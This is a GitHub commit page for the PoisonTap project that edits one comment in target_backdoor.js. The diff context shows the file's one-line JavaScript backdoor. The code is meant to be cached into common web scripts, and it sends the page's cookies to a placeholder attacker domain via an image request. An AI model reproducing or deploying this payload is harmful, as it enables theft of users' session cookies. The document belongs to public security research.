Skip to content

Commit

Permalink
Merge pull request samyk#12 from ddgva/patch-1
Browse files Browse the repository at this point in the history
Updated comment
  • Loading branch information
samyk authored Nov 17, 2016
2 parents db96d33 + e7d3c73 commit d7a1594
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion target_backdoor.js
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
/* This javascript is prepended and cached to many common JS files on the web such as Google's CDN files, found in the poisontap/js/ directory.
* By default, it logs the domain's cookies. Change 'samy.pl' to your domain.
* By default, it logs the domain's cookies. Change 'YOUR.DOMAIN' to your domain.
*/
new Image().src='http://YOUR.DOMAIN/poisontap/log.php?log='+document.cookies;

0 comments on commit d7a1594

Please sign in to comment.